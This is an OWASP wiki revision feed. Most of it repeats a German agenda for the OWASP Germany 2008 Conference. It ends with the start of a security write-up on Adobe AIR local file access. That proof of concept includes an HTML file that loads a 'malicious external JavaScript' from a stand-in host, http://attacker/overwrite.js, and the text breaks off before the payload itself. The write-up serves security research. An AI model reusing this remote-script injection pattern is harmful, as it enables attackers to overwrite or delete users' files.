|style=&amp;quot;background-color:#99CCFF&amp;quot; height=&amp;quot;13&amp;quot; | Studenten&lt;br /&gt;
 | kostenlos&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Sponsoring ==&lt;br /&gt;
&lt;br /&gt;
Es besteht die Möglichkeit zum Ausstellen und zum Logo-Sponsoring. [http://www.owasp.org/index.php/Image:OWASP_D_2008_Sponsoren_Info.pdf Infos für Sponsoren hier.]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zurück zur [[Germany|OWASP Germany Homepage]].&lt;/div&gt;</summary>
		<author><name>Fukami</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Germany_2008_Conference&amp;diff=43395</id>
		<title>OWASP Germany 2008 Conference</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Germany_2008_Conference&amp;diff=43395"/>
				<updated>2008-10-15T14:39:43Z</updated>
		
		<summary type="html">&lt;p&gt;Fukami: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Die OWASP Germany 2008 Konferenz wird am 25.11.08 mit einer Vorabendveranstalung am 24.11.08 in Frankfurt stattfinden.&lt;br /&gt;
(The OWASP Germany 2008 conference will be held on November 25, 2008 in Frankfurt.)&lt;br /&gt;
&lt;br /&gt;
Veranstaltungsort: Steigenberger Airport Hotel (per Bahn und Flieger gleichermaßen gut zu erreichen)&lt;br /&gt;
&lt;br /&gt;
== Agenda ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; &amp;lt;hiddentext&amp;gt;generated with [[:de:Wikipedia:Helferlein/VBA-Macro for EXCEL tableconversion]] V1.7&amp;lt;\hiddentext&amp;gt;&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| width=&amp;quot;96&amp;quot; height=&amp;quot;16&amp;quot; | 9 00-9:30&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; width=&amp;quot;231&amp;quot; colspan=&amp;quot;2&amp;quot; | Registrierung&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | 9:30-9:45&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Begrüßung&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; height=&amp;quot;16&amp;quot; | 9:45-10:30&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | OWASP Overview (in Englisch)&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Sebastien Deleersnyder, OWASP Foundation Board Member&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | 10:30-11:15&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Wirtschaftlichkeitsbetrachtungen von IT-Sicherheitsmaßnahmen &lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot;  valign=&amp;quot;top&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; valign=&amp;quot;top&amp;quot; | Max Dermann, Lufthansa Technik AG&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | 11:15-11:30&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Kaffeepause&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; height=&amp;quot;16&amp;quot; | 11:30-12:15&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Kickstart für sichere Webanwendungen&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Thomas Schreiber, SecureNet&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | 12:15-13:00&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | NN&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
 | &amp;amp;nbsp;&lt;br /&gt;
 | &amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | 13:00-14:00&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Mittagspause / Essen&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; height=&amp;quot;16&amp;quot; | 14:00-14:45&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Vorstellung des OWASP Best Practices Guide zum Einsatz von Web Application Firewalls&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Alex Meisel, Art of Defence&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | 5 min&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Raumsuche&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Tracks: 30 Min Präsentation , 10 Min Diskussion + Raumsuche&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Track 1&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Track 2&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;32&amp;quot; | 14.50-15:30&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Sicherheit von Rich Internet Applications&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Server-side Detection of XSS&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
 | fukami, SektionEins GmbH&lt;br /&gt;
 | Martin Johns, Uni Passau&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;32&amp;quot; | 15:30-16:10&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Measuring the Security of Web Applications&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Cross-Site Scripting Filter Evasion &lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
 | Sebastian Schinzel, Virtual Forge&lt;br /&gt;
 | Alexios Fakos, n.runs&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | 16:10-16:30&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Kaffeepause&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;32&amp;quot; | 16:30-17:10&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Security-by-Design durch Einsatz von MVC&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Learning of Positive Security Models for Web-Applications&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
 | Mirko Richter, SecureNet GmbH&lt;br /&gt;
 | Christian Bockermann&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; height=&amp;quot;16&amp;quot; | 17:10-17:50&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Goldene Regeln der IT-Sicherheit bei der Beauftragung und Erstellung von Software&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Tom Schröer, SAP AG (angefragt), Dr. Boris Hemkemeier, Commerzbank&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | 17:50-18:00&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Schlußwort&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Anmeldung und Preise ==&lt;br /&gt;
&lt;br /&gt;
Anmeldeinformationen in Kürze an dieser Stelle.&lt;br /&gt;
&lt;br /&gt;
Preise:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; &amp;lt;hiddentext&amp;gt;generated with [[:de:Wikipedia:Helferlein/VBA-Macro for EXCEL tableconversion]] V1.7&amp;lt;\hiddentext&amp;gt;&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; width=&amp;quot;112&amp;quot; height=&amp;quot;13&amp;quot; | „normaler“ Teilnehmer&lt;br /&gt;
| width=&amp;quot;60&amp;quot; | 150 EUR&lt;br /&gt;
&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; height=&amp;quot;13&amp;quot; | OWASP-Mitglied&lt;br /&gt;
 | 100 EUR&lt;br /&gt;
&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; height=&amp;quot;13&amp;quot; | Studenten&lt;br /&gt;
 | kostenlos&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Sponsoring ==&lt;br /&gt;
&lt;br /&gt;
Es besteht die Möglichkeit zum Ausstellen und zum Logo-Sponsoring. [http://www.owasp.org/index.php/Image:OWASP_D_2008_Sponsoren_Info.pdf Infos für Sponsoren hier.]&lt;/div&gt;</summary>
		<author><name>Fukami</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Germany_2008_Conference&amp;diff=43394</id>
		<title>OWASP Germany 2008 Conference</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Germany_2008_Conference&amp;diff=43394"/>
				<updated>2008-10-15T14:35:12Z</updated>
		
		<summary type="html">&lt;p&gt;Fukami: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Die OWASP Germany 2008 Konferenz wird am 25.11.08 mit einer Vorabendveranstalung am 24.11.08 in Frankfurt stattfinden.&lt;br /&gt;
(The OWASP Germany 2008 conference will be held on November 25, 2008 in Frankfurt.)&lt;br /&gt;
&lt;br /&gt;
Veranstaltungsort: Steigenberger Airport Hotel (per Bahn und Flieger gleichermaßen gut zu erreichen)&lt;br /&gt;
&lt;br /&gt;
== Agenda ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; &amp;lt;hiddentext&amp;gt;generated with [[:de:Wikipedia:Helferlein/VBA-Macro for EXCEL tableconversion]] V1.7&amp;lt;\hiddentext&amp;gt;&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| width=&amp;quot;96&amp;quot; height=&amp;quot;16&amp;quot; | 9 00-9:30&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; width=&amp;quot;231&amp;quot; colspan=&amp;quot;2&amp;quot; | Registrierung&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | 9:30-9:45&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Begrüßung&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; height=&amp;quot;16&amp;quot; | 9:45-10:30&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | OWASP Overview (in Englisch)&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Sebastien Deleersnyder, OWASP Foundation Board Member&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | 10:30-11:15&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Wirtschaftlichkeitsbetrachtungen von IT-Sicherheitsmaßnahmen &lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot;  valign=&amp;quot;top&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; valign=&amp;quot;top&amp;quot; | Max Dermann, Lufthansa Technik AG&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | 11:15-11:30&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Kaffeepause&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; height=&amp;quot;16&amp;quot; | 11:30-12:15&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Kickstart für sichere Webanwendungen&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Thomas Schreiber, SecureNet&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | 12:15-13:00&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | NN&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
 | &amp;amp;nbsp;&lt;br /&gt;
 | &amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | 13:00-14:00&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Mittagspause / Essen&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; height=&amp;quot;16&amp;quot; | 14:00-14:45&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Vorstellung des OWASP Best Practices Guide zum Einsatz von Web Application Firewalls&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Alex Meisel, Art of Defence&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | 5 min&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Raumsuche&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Tracks: 30 Min Präsentation , 10 Min Diskussion + Raumsuche&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Track 1&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Track 2&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;32&amp;quot; | 14.50-15:30&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Sicherheit von Rich Internet Applications&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Server-side Detection of XSS&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
 | fukami&lt;br /&gt;
 | Martin Johns, Uni Passau&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;32&amp;quot; | 15:30-16:10&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Measuring the Security of Web Applications&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Cross-Site Scripting Filter Evasion &lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
 | Sebastian Schinzel, Virtual Forge&lt;br /&gt;
 | Alexios Fakos, n.runs&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | 16:10-16:30&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Kaffeepause&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;32&amp;quot; | 16:30-17:10&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Security-by-Design durch Einsatz von MVC&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Learning of Positive Security Models for Web-Applications&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
 | Mirko Richter, SecureNet GmbH&lt;br /&gt;
 | Christian Bockermann&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; height=&amp;quot;16&amp;quot; | 17:10-17:50&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Goldene Regeln der IT-Sicherheit bei der Beauftragung und Erstellung von Software&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Tom Schröer, SAP AG (angefragt), Dr. Boris Hemkemeier, Commerzbank&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | 17:50-18:00&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Schlußwort&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Anmeldung und Preise ==&lt;br /&gt;
&lt;br /&gt;
Anmeldeinformationen in Kürze an dieser Stelle.&lt;br /&gt;
&lt;br /&gt;
Preise:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; &amp;lt;hiddentext&amp;gt;generated with [[:de:Wikipedia:Helferlein/VBA-Macro for EXCEL tableconversion]] V1.7&amp;lt;\hiddentext&amp;gt;&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; width=&amp;quot;112&amp;quot; height=&amp;quot;13&amp;quot; | „normaler“ Teilnehmer&lt;br /&gt;
| width=&amp;quot;60&amp;quot; | 150 EUR&lt;br /&gt;
&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; height=&amp;quot;13&amp;quot; | OWASP-Mitglied&lt;br /&gt;
 | 100 EUR&lt;br /&gt;
&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; height=&amp;quot;13&amp;quot; | Studenten&lt;br /&gt;
 | kostenlos&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Sponsoring ==&lt;br /&gt;
&lt;br /&gt;
Es besteht die Möglichkeit zum Ausstellen und zum Logo-Sponsoring. [http://www.owasp.org/index.php/Image:OWASP_D_2008_Sponsoren_Info.pdf Infos für Sponsoren hier.]&lt;/div&gt;</summary>
		<author><name>Fukami</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AIR&amp;diff=19576</id>
		<title>AIR</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AIR&amp;diff=19576"/>
				<updated>2007-07-03T19:34:51Z</updated>
		
		<summary type="html">&lt;p&gt;Fukami: some formatting&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''Write up: Security on AIR: Local file access through JavaScript'''&lt;br /&gt;
&lt;br /&gt;
It's just a very first look to AIR (Adobes Integrated Runtime) and its possibilities to process HTML/JS. AIR is beta by now, so Adobe may change things in the final release.&lt;br /&gt;
&lt;br /&gt;
* What is AIR?&lt;br /&gt;
Quote from Adobe: &lt;br /&gt;
  &amp;quot;Adobe Integrated Runtime (AIR) is a cross-operating system runtime that allows &lt;br /&gt;
  you to leverage your existing web development skills (Flash, Flex, HTML, JavaScript, &lt;br /&gt;
  Ajax) to build and deploy Rich Internet Applications (RIAs) to the desktop.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Some security related informations on AIR:&lt;br /&gt;
** The installer throws a warning about it's ability for unrestricted system access (so it's not a real surprise what AIR apps are capable of)&lt;br /&gt;
** AIR uses WebKit as renderer on both supported platforms, Windows and MacOS&lt;br /&gt;
** AIR introduces some JavaScript functions to access file systems and remote services, file SQL queries and open sockets&lt;br /&gt;
** SWF files in the AIR application sandbox can cross-script any SWF file from any domain&lt;br /&gt;
** Remote SWF files can only read files inside the security sandbox&lt;br /&gt;
** SWF/ActionScript objects can access DOM and JavaScript (and vice versa I guess)&lt;br /&gt;
** External JavaScript sources can be included and executed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* File access&lt;br /&gt;
In general every file on local file system can be accessed by AIR apps. This includes reading, writing, appending or deletion as well as testing for file and directory existence. Another interesting feature is the possibility to overwrite calling files inside compiled AIR application during runtime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Example (only tested on OSX so far) &lt;br /&gt;
For this to work in a real world scenario a service used by an AIRapp must be vulnerable to a persistant XSS (or another typical&lt;br /&gt;
vulnerability), and the app needs to call data in a way that payloads gets rendered and executed.&lt;br /&gt;
&lt;br /&gt;
* This basic example consists of 4 files:&lt;br /&gt;
** AIR application descriptor file: App.xml&lt;br /&gt;
** Calling HTML file inside the AIR app package: caller.html&lt;br /&gt;
** Malicious external JavaScript: overwrite.js&lt;br /&gt;
** A file which just contains aliases for AIR runtime: AIRAliases.js (part of AIR SDK)&lt;br /&gt;
&lt;br /&gt;
* App.xml&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;application xmlns=&amp;quot;http://ns.adobe.com/air/application/1.0.M4&amp;quot; appId=&amp;quot;air.poc.overwrite&amp;quot; version=&amp;quot;0.1&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;name&amp;gt;AIR Overwrite&amp;lt;/name&amp;gt;&lt;br /&gt;
   &amp;lt;rootContent systemChrome=&amp;quot;standard&amp;quot; visible=&amp;quot;true&amp;quot;&amp;gt;caller.html&amp;lt;/rootContent&amp;gt;&lt;br /&gt;
 &amp;lt;/application&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* caller.html&lt;br /&gt;
# For lazyness reasons the JS is included straight away&lt;br /&gt;
# But it also works if exploited and included during runtime&lt;br /&gt;
 &amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
 &amp;lt;title&amp;gt;AIR Overwrite&amp;lt;/title&amp;gt;&lt;br /&gt;
 &amp;lt;script src=&amp;quot;AIRAliases.js&amp;quot; type=&amp;quot;text/javascript&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
 &amp;lt;script src=&amp;quot;http://attacker/overwrite.js&amp;quot; type=&amp;quot;text/javascript&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body onload=&amp;quot;remoteLoad()&amp;quot;&amp;gt;&lt;br /&gt;
 some local data&lt;br /&gt;
